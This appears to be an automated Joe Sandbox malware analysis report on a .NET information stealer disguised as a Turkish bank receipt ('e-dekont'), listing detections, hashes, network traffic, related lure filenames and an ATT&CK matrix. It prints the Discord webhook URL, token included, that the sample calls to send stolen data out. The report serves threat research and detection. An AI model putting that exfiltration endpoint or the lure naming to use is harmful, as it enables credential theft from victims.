Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Remote System Discovery	SSH	1 Clipboard Data	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Masquerading	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	131 Virtualization/Sandbox Evasion	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	311 Process Injection	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
e-dekont-20230206.exe	41%	ReversingLabs	ByteCode-MSIL.Trojan.GenSteal
e-dekont-20230206.exe	55%	Virustotal		Browse
e-dekont-20230206.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.2.CasPol.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1203035		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://discord.com	0%	URL Reputation	safe
http://discord.com	0%	URL Reputation	safe
https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr	0%	Avira URL Cloud	safe
https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31	0%	Avira URL Cloud	safe
https://discord.com4Dp	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
discord.com	162.159.135.232	true	true	unknown
api4.ipify.org	64.185.227.155	true	false	high
api.ipify.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.ipify.org	CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmp	false		high
https://discord.com	CasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://discord.com	CasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmp	false		high
https://discord.com4Dp	CasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31	CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
64.185.227.155	api4.ipify.org	United States		18450	WEBNXUS	false
162.159.135.232	discord.com	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	800718
Start date and time:	2023-02-07 18:40:32 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	e-dekont-20230206.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@3/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 17.5% (good quality ratio 13.2%) Quality average: 49.2% Quality standard deviation: 37.2%
HCA Information:	Successful, ratio: 95% Number of executed functions: 29 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
18:41:28	API Interceptor	994x Sleep call for process: CasPol.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
64.185.227.155	M74aRxVX4H.exe	Get hash	malicious	Browse	api.ipify.org/
	WolcGwXQ5c.exe	Get hash	malicious	Browse	api.ipify.org/?format=wef
	XZerken3Py.exe	Get hash	malicious	Browse	api.ipify.org/
	xc17rfFdOM.exe	Get hash	malicious	Browse	api.ipify.org/?format=wef
	8Ghi4RAfH5.exe	Get hash	malicious	Browse	api.ipify.org/?format=wef
	fb623f4ae4dcaa007cac4365aa3ce13526ae32b94f2d9.exe	Get hash	malicious	Browse	api.ipify.org/?format=wef
	file.exe	Get hash	malicious	Browse	api.ipify.org/?format=wef
	48PTRR4pVY.exe	Get hash	malicious	Browse	api.ipify.org/?format=qwd

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
discord.com	e-dekont-20230207.exe	Get hash	malicious	Browse	162.159.128.233
	RFQ-N-12192.1.exe	Get hash	malicious	Browse	162.159.138.232
	OpVrIJpDqF.exe	Get hash	malicious	Browse	162.159.135.232
	L0EozIGr75.exe	Get hash	malicious	Browse	162.159.138.232
	AWVpR481pe.exe	Get hash	malicious	Browse	162.159.136.232
	DHL SHIPMENT AND TRACKING NUMBER pdf.exe	Get hash	malicious	Browse	162.159.138.232
	j8Vm9XHOvJ.exe	Get hash	malicious	Browse	162.159.128.233
	MV BELLIGHT DISCH ABT 46982 MTS OF SOYABEANS IN BULK FORMAL AGENCY APPOINTMENT_pdf.exe	Get hash	malicious	Browse	162.159.137.232
	setup.exe	Get hash	malicious	Browse	162.159.136.232
	Built.exe	Get hash	malicious	Browse	162.159.136.232
	Creal.exe	Get hash	malicious	Browse	162.159.135.232
	rcm.exe	Get hash	malicious	Browse	162.159.136.232
	main.exe	Get hash	malicious	Browse	162.159.128.233
	S3zoj9Uts0.exe	Get hash	malicious	Browse	162.159.138.232
	uBZeAVcb6r.exe	Get hash	malicious	Browse	162.159.137.232
	e-dekont-20230127.exe	Get hash	malicious	Browse	162.159.137.232
	XZdImqRrwQ.exe	Get hash	malicious	Browse	162.159.135.232
	e-dekont-20230202.exe	Get hash	malicious	Browse	162.159.128.233
	Request for PO_2023.js	Get hash	malicious	Browse	162.159.128.233
	Payload.exe	Get hash	malicious	Browse	162.159.135.232
api4.ipify.org	e-dekont-20230207.exe	Get hash	malicious	Browse	64.185.227.155
	OR98764357890-098.exe	Get hash	malicious	Browse	104.237.62.211
	PO_72302991PDF.exe	Get hash	malicious	Browse	104.237.62.211
	PO-7654321.exe	Get hash	malicious	Browse	104.237.62.211
	Solicitar Cotizacion.pdf.exe	Get hash	malicious	Browse	173.231.16.76
	AWB NO. 8148557141.exe	Get hash	malicious	Browse	64.185.227.155
	FAXMESSAGE.exe	Get hash	malicious	Browse	104.237.62.211
	PAGO SWIFT PDF__.pif.exe	Get hash	malicious	Browse	64.185.227.155
	FSSC-23-0103000RPM.PDF.exe	Get hash	malicious	Browse	173.231.16.76
	Encargar art#U00edculos.exe	Get hash	malicious	Browse	64.185.227.155
	file.vbs	Get hash	malicious	Browse	173.231.16.76
	LgeyCTeaGW.exe	Get hash	malicious	Browse	64.185.227.155
	vjr6Z8GOjQ.exe	Get hash	malicious	Browse	104.237.62.211
	n8mcz6yv7k.exe	Get hash	malicious	Browse	104.237.62.211
	https://my-taiken.com/note.html	Get hash	malicious	Browse	173.231.16.76
	3RejTiuKP7.exe	Get hash	malicious	Browse	173.231.16.76
	Arrival Notice.exe	Get hash	malicious	Browse	104.237.62.211
	210909836-042205.exe	Get hash	malicious	Browse	104.237.62.211
	FOKB2DLFdA.exe	Get hash	malicious	Browse	173.231.16.76
	gvV0vtivHs.exe	Get hash	malicious	Browse	104.237.62.211

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	Roqwnrsun.exe	Get hash	malicious	Browse	162.159.130.233
	e-dekont-20230207.exe	Get hash	malicious	Browse	162.159.128.233
	Benefit_Enrollment.html	Get hash	malicious	Browse	104.17.25.14
	XQCOqfWkm8.exe	Get hash	malicious	Browse	162.159.134.233
	ACH_Electronic_Deposit.shtml	Get hash	malicious	Browse	104.17.25.14
	Unv67CLhJv.exe	Get hash	malicious	Browse	162.159.133.233
	Application_debloated.exe	Get hash	malicious	Browse	162.159.135.233
	0x000600000001ace8-206.exe	Get hash	malicious	Browse	104.20.68.143
	xakJ7het39.exe	Get hash	malicious	Browse	188.114.96.3
	Hilcorp Bonus Settlement.eml (5.22 KB).msg	Get hash	malicious	Browse	104.17.25.14
	https://www.canva.com/design/DAFZ4mIuTRk/xh916WsoV133Oxh-V4YbYw/view?utm_content=DAFZ4mIuTRk&utm_campaign=designshare&utm_medium=link&utm_source=publishsharelink	Get hash	malicious	Browse	104.16.57.101
	PRICE ENQUIRY ENQ REF_PDF_____________________________.........exe	Get hash	malicious	Browse	188.114.96.3
	AR_STATEMENT_13740_ARIHANT ELECTRI_02JEN06_115700.exe	Get hash	malicious	Browse	104.21.79.47
	https://fruitandpods.com/besnet/empresas/dcab232/Sign_in.php	Get hash	malicious	Browse	104.18.1.236
	210909836-042205.exe	Get hash	malicious	Browse	188.114.96.3
	https://w0y0bz.webwave.dev/lib/w0y0bz/RFQ02062023-ldslhqdl.html#poststelle@stadt.nuernberg.de	Get hash	malicious	Browse	104.20.18.53
	#Ud83d#Udce0 1 of 3 Pages.htm	Get hash	malicious	Browse	104.18.10.207
	https://www.googleadservices.com/pagead/aclk?sa=L&ai=CkwvK0P_hY8HmHqzkn88PyfuFuAWgo7fvbs6fqp-VEZGs05XEOBABIIHZ_iFgyQagAZOftLAoyAEJqQLjAdLjEvh5PqgDAcgDywSqBNcBT9DF_iX400IybEW3Pr6wAP-unvMjI3QSAapE6PY1e4nW5NWKB41op30pMboy0XCoPrXu7CNTcCMGeey1XtmKUgKbua3PEd7d8iSVBezN1_nZqT0JcBzMecORTxu_F8eCphEg6iih3KhpzzdErNKbKHo4QV0ywpPFvMuZ3jo2yS4wpXHFiWkk5VTaH9WZi4OenRX7ZqzE2P8_pKVLM30PUS0k-HTbrJJ-9SAoN4qZ0SoufwzHZ2CbVg2_WHfzg3cj_ZXuCwBLBhnHmi0ale5VhZw_d81os6TABPq-rLGbBKAGLoAHnKTY_QOoB47OG6gHk9gbqAfulrECqAf-nrECqAeko7ECqAfVyRuoB6a-G6gHmgaoB_PRG6gHltgbqAeqm7ECqAf_nrECqAffn7EC2AcA0ggPCIBhEAEYHzICigI6AoBAsQkBrnSxVCnjCIAKAZgLAcgLAYAMAbgMAdgTDNAVAfgWAYAXAQ&ae=1&num=1&cid=CAQSOwDUE5ymZxT0dLU_6yG71JZyq7bVZF3KxZaaSOrqGKatE9XZNh61FPPUu9DHSG-OenQe7WgVmA55if6mGAE&sig=AOD64_1lTBUid_DTEGtbwCI40J1FZksITw&client=ca-pub-9816945270938969&rf=1&nb=9&adurl=http://nu.fekru.rlntlss.net%3A%2F%2F%23aHR0cHM6Ly9teWZhbWlseWFjdS5jb20vbmV3L2F1dGgvQ29uZGVuYXN0L2tlZWxleS5rbm93bGVzQGNvbmRlbmFzdC5jby51aw==	Get hash	malicious	Browse	104.17.25.14
	RFQ-N-12192.1.exe	Get hash	malicious	Browse	162.159.138.232
	http://moon-palace.ca	Get hash	malicious	Browse	104.19.255.55
WEBNXUS	e-dekont-20230207.exe	Get hash	malicious	Browse	64.185.227.155
	OR98764357890-098.exe	Get hash	malicious	Browse	104.237.62.211
	PO_72302991PDF.exe	Get hash	malicious	Browse	104.237.62.211
	PO-7654321.exe	Get hash	malicious	Browse	104.237.62.211
	Solicitar Cotizacion.pdf.exe	Get hash	malicious	Browse	173.231.16.76
	AWB NO. 8148557141.exe	Get hash	malicious	Browse	64.185.227.155
	FAXMESSAGE.exe	Get hash	malicious	Browse	104.237.62.211
	PAGO SWIFT PDF__.pif.exe	Get hash	malicious	Browse	64.185.227.155
	FSSC-23-0103000RPM.PDF.exe	Get hash	malicious	Browse	173.231.16.76
	Encargar art#U00edculos.exe	Get hash	malicious	Browse	173.231.16.76
	file.vbs	Get hash	malicious	Browse	173.231.16.76
	LgeyCTeaGW.exe	Get hash	malicious	Browse	64.185.227.155
	vjr6Z8GOjQ.exe	Get hash	malicious	Browse	104.237.62.211
	n8mcz6yv7k.exe	Get hash	malicious	Browse	104.237.62.211
	https://my-taiken.com/note.html	Get hash	malicious	Browse	173.231.16.76
	3RejTiuKP7.exe	Get hash	malicious	Browse	173.231.16.76
	Arrival Notice.exe	Get hash	malicious	Browse	104.237.62.211
	210909836-042205.exe	Get hash	malicious	Browse	104.237.62.211
	FOKB2DLFdA.exe	Get hash	malicious	Browse	173.231.16.76
	gvV0vtivHs.exe	Get hash	malicious	Browse	104.237.62.211

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Roqwnrsun.exe	Get hash	malicious	Browse	162.159.135.232 64.185.227.155
	e-dekont-20230207.exe	Get hash	malicious	Browse	162.159.135.232 64.185.227.155
	notes.one	Get hash	malicious	Browse	162.159.135.232 64.185.227.155
	0x000600000001ace8-206.exe	Get hash	malicious	Browse	162.159.135.232 64.185.227.155
	OR98764357890-098.exe	Get hash	malicious	Browse	162.159.135.232 64.185.227.155
	PO_72302991PDF.exe	Get hash	malicious	Browse	162.159.135.232 64.185.227.155
	PO-7654321.exe	Get hash	malicious	Browse	162.159.135.232 64.185.227.155
	elementrv Remittance.html	Get hash	malicious	Browse	162.159.135.232 64.185.227.155
	Solicitar Cotizacion.pdf.exe	Get hash	malicious	Browse	162.159.135.232 64.185.227.155
	item.one	Get hash	malicious	Browse	162.159.135.232 64.185.227.155
	210909836-042205.exe	Get hash	malicious	Browse	162.159.135.232 64.185.227.155
	AWB NO. 8148557141.exe	Get hash	malicious	Browse	162.159.135.232 64.185.227.155
	FAXMESSAGE.exe	Get hash	malicious	Browse	162.159.135.232 64.185.227.155
	PAGO SWIFT PDF__.pif.exe	Get hash	malicious	Browse	162.159.135.232 64.185.227.155
	Original.one	Get hash	malicious	Browse	162.159.135.232 64.185.227.155
	RFQ-N-12192.1.exe	Get hash	malicious	Browse	162.159.135.232 64.185.227.155
	FSSC-23-0103000RPM.PDF.exe	Get hash	malicious	Browse	162.159.135.232 64.185.227.155
	svc.exe	Get hash	malicious	Browse	162.159.135.232 64.185.227.155
	Req For F1 USD 33 325.00.exe	Get hash	malicious	Browse	162.159.135.232 64.185.227.155
	Encargar art#U00edculos.exe	Get hash	malicious	Browse	162.159.135.232 64.185.227.155

Process:	C:\Users\user\Desktop\e-dekont-20230206.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.354940450065058
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
MD5:	B10E37251C5B495643F331DB2EEC3394
SHA1:	25A5FFE4C2554C2B9A7C2794C9FE215998871193
SHA-256:	8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
SHA-512:	296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.959804344180061
TrID:	Win64 Executable GUI Net Framework (217006/5) 47.53% Win64 Executable GUI (202006/5) 44.25% Win64 Executable (generic) Net Framework (21505/4) 4.71% Win64 Executable (generic) (12005/4) 2.63% Generic Win/DOS Executable (2004/3) 0.44%
File name:	e-dekont-20230206.exe
File size:	695808
MD5:	33a5f92deee382035467caff29a8d487
SHA1:	7e6daec4a2a4dde0f5148df4165fa8cebb7011e4
SHA256:	e3b4406836308220da7989e5d539486ee1b71b4cc25a822e056993ab44675666
SHA512:	c2c3a2ffc2719245166a561050a0c4d9ece584dea47997bb5db1cc30885e31e2a5af3cfbb27526835b10bdda71b572c307e8704a1ac53e9119cfe63c760f66af
SSDEEP:	12288:vjsouJ3dUctF0KHbYXj/oNmsNjMQWwBTMYvwgScpK3J+ZBJwsscBDZn0Vx1NdB:2NUc7TbEDoNtQQWwKYvJScg63scDnu
TLSH:	46E422177ACF0214D49829B282EF076503E95B85A1B7DABD3F4573AD06723E6BE43702
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........................z... ........... ....@...... ....................................`................................

File Icon


Icon Hash:	92aca8b2b2a2b286

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xEC8B859F [Tue Oct 4 11:38:07 2095 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xac000	0x1b8c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0xa98da	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa7974	0xa7a00	False	0.9695758179530202	data	7.97077131969678	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata	0xaa000	0x1e8	0x200	False	0.86328125	data	6.5950997415198165	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xac000	0x1b8c	0x1c00	False	0.34444754464285715	data	5.438495976746426	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xac160	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224
RT_ICON	0xad208	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088
RT_GROUP_ICON	0xad670	0x22	data
RT_VERSION	0xad694	0x30c	data
RT_MANIFEST	0xad9a0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.5162.159.135.232497034432851779 02/07/23-18:41:32.301093	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49703	443	192.168.2.5	162.159.135.232

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 7, 2023 18:41:27.266633987 CET	49702	443	192.168.2.5	64.185.227.155
Feb 7, 2023 18:41:27.266757011 CET	443	49702	64.185.227.155	192.168.2.5
Feb 7, 2023 18:41:27.266869068 CET	49702	443	192.168.2.5	64.185.227.155
Feb 7, 2023 18:41:27.355532885 CET	49702	443	192.168.2.5	64.185.227.155
Feb 7, 2023 18:41:27.355787039 CET	443	49702	64.185.227.155	192.168.2.5
Feb 7, 2023 18:41:27.679862976 CET	443	49702	64.185.227.155	192.168.2.5
Feb 7, 2023 18:41:27.680044889 CET	49702	443	192.168.2.5	64.185.227.155
Feb 7, 2023 18:41:27.696712971 CET	49702	443	192.168.2.5	64.185.227.155
Feb 7, 2023 18:41:27.696759939 CET	443	49702	64.185.227.155	192.168.2.5
Feb 7, 2023 18:41:27.697472095 CET	443	49702	64.185.227.155	192.168.2.5
Feb 7, 2023 18:41:27.746340990 CET	49702	443	192.168.2.5	64.185.227.155
Feb 7, 2023 18:41:28.034023046 CET	49702	443	192.168.2.5	64.185.227.155
Feb 7, 2023 18:41:28.034092903 CET	443	49702	64.185.227.155	192.168.2.5
Feb 7, 2023 18:41:28.132925987 CET	443	49702	64.185.227.155	192.168.2.5
Feb 7, 2023 18:41:28.133024931 CET	443	49702	64.185.227.155	192.168.2.5
Feb 7, 2023 18:41:28.133107901 CET	49702	443	192.168.2.5	64.185.227.155
Feb 7, 2023 18:41:28.134315968 CET	49702	443	192.168.2.5	64.185.227.155
Feb 7, 2023 18:41:32.177478075 CET	49703	443	192.168.2.5	162.159.135.232
Feb 7, 2023 18:41:32.177515984 CET	443	49703	162.159.135.232	192.168.2.5
Feb 7, 2023 18:41:32.177587032 CET	49703	443	192.168.2.5	162.159.135.232
Feb 7, 2023 18:41:32.178462982 CET	49703	443	192.168.2.5	162.159.135.232
Feb 7, 2023 18:41:32.178472042 CET	443	49703	162.159.135.232	192.168.2.5
Feb 7, 2023 18:41:32.237952948 CET	443	49703	162.159.135.232	192.168.2.5
Feb 7, 2023 18:41:32.238046885 CET	49703	443	192.168.2.5	162.159.135.232
Feb 7, 2023 18:41:32.240590096 CET	49703	443	192.168.2.5	162.159.135.232
Feb 7, 2023 18:41:32.240601063 CET	443	49703	162.159.135.232	192.168.2.5
Feb 7, 2023 18:41:32.241060019 CET	443	49703	162.159.135.232	192.168.2.5
Feb 7, 2023 18:41:32.243566990 CET	49703	443	192.168.2.5	162.159.135.232
Feb 7, 2023 18:41:32.243582010 CET	443	49703	162.159.135.232	192.168.2.5
Feb 7, 2023 18:41:32.300604105 CET	443	49703	162.159.135.232	192.168.2.5
Feb 7, 2023 18:41:32.300971985 CET	49703	443	192.168.2.5	162.159.135.232
Feb 7, 2023 18:41:32.300987959 CET	443	49703	162.159.135.232	192.168.2.5
Feb 7, 2023 18:41:32.434633017 CET	443	49703	162.159.135.232	192.168.2.5
Feb 7, 2023 18:41:32.434804916 CET	443	49703	162.159.135.232	192.168.2.5
Feb 7, 2023 18:41:32.434914112 CET	49703	443	192.168.2.5	162.159.135.232
Feb 7, 2023 18:41:32.509637117 CET	49703	443	192.168.2.5	162.159.135.232

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 7, 2023 18:41:27.189271927 CET	60649	53	192.168.2.5	8.8.8.8
Feb 7, 2023 18:41:27.209341049 CET	53	60649	8.8.8.8	192.168.2.5
Feb 7, 2023 18:41:27.222088099 CET	51441	53	192.168.2.5	8.8.8.8
Feb 7, 2023 18:41:27.244609118 CET	53	51441	8.8.8.8	192.168.2.5
Feb 7, 2023 18:41:32.139256954 CET	49177	53	192.168.2.5	8.8.8.8
Feb 7, 2023 18:41:32.159280062 CET	53	49177	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 7, 2023 18:41:27.189271927 CET	192.168.2.5	8.8.8.8	0x302e	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Feb 7, 2023 18:41:27.222088099 CET	192.168.2.5	8.8.8.8	0x612d	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Feb 7, 2023 18:41:32.139256954 CET	192.168.2.5	8.8.8.8	0x8350	Standard query (0)	discord.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 7, 2023 18:41:27.209341049 CET	8.8.8.8	192.168.2.5	0x302e	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
Feb 7, 2023 18:41:27.209341049 CET	8.8.8.8	192.168.2.5	0x302e	No error (0)	api4.ipify.org		64.185.227.155	A (IP address)	IN (0x0001)	false
Feb 7, 2023 18:41:27.209341049 CET	8.8.8.8	192.168.2.5	0x302e	No error (0)	api4.ipify.org		173.231.16.76	A (IP address)	IN (0x0001)	false
Feb 7, 2023 18:41:27.209341049 CET	8.8.8.8	192.168.2.5	0x302e	No error (0)	api4.ipify.org		104.237.62.211	A (IP address)	IN (0x0001)	false
Feb 7, 2023 18:41:27.244609118 CET	8.8.8.8	192.168.2.5	0x612d	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
Feb 7, 2023 18:41:27.244609118 CET	8.8.8.8	192.168.2.5	0x612d	No error (0)	api4.ipify.org		173.231.16.76	A (IP address)	IN (0x0001)	false
Feb 7, 2023 18:41:27.244609118 CET	8.8.8.8	192.168.2.5	0x612d	No error (0)	api4.ipify.org		104.237.62.211	A (IP address)	IN (0x0001)	false
Feb 7, 2023 18:41:27.244609118 CET	8.8.8.8	192.168.2.5	0x612d	No error (0)	api4.ipify.org		64.185.227.155	A (IP address)	IN (0x0001)	false
Feb 7, 2023 18:41:32.159280062 CET	8.8.8.8	192.168.2.5	0x8350	No error (0)	discord.com		162.159.135.232	A (IP address)	IN (0x0001)	false
Feb 7, 2023 18:41:32.159280062 CET	8.8.8.8	192.168.2.5	0x8350	No error (0)	discord.com		162.159.136.232	A (IP address)	IN (0x0001)	false
Feb 7, 2023 18:41:32.159280062 CET	8.8.8.8	192.168.2.5	0x8350	No error (0)	discord.com		162.159.128.233	A (IP address)	IN (0x0001)	false
Feb 7, 2023 18:41:32.159280062 CET	8.8.8.8	192.168.2.5	0x8350	No error (0)	discord.com		162.159.137.232	A (IP address)	IN (0x0001)	false
Feb 7, 2023 18:41:32.159280062 CET	8.8.8.8	192.168.2.5	0x8350	No error (0)	discord.com		162.159.138.232	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

discord.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49702	64.185.227.155	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	Direction	Data
2023-02-07 17:41:28 UTC	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2023-02-07 17:41:28 UTC	IN	HTTP/1.1 200 OK Content-Length: 11 Content-Type: text/plain Date: Tue, 07 Feb 2023 17:41:28 GMT Vary: Origin Connection: close
2023-02-07 17:41:28 UTC	IN	Data Raw: 38 34 2e 31 37 2e 35 32 2e 31 33 Data Ascii: 84.17.52.13

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49703	162.159.135.232	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
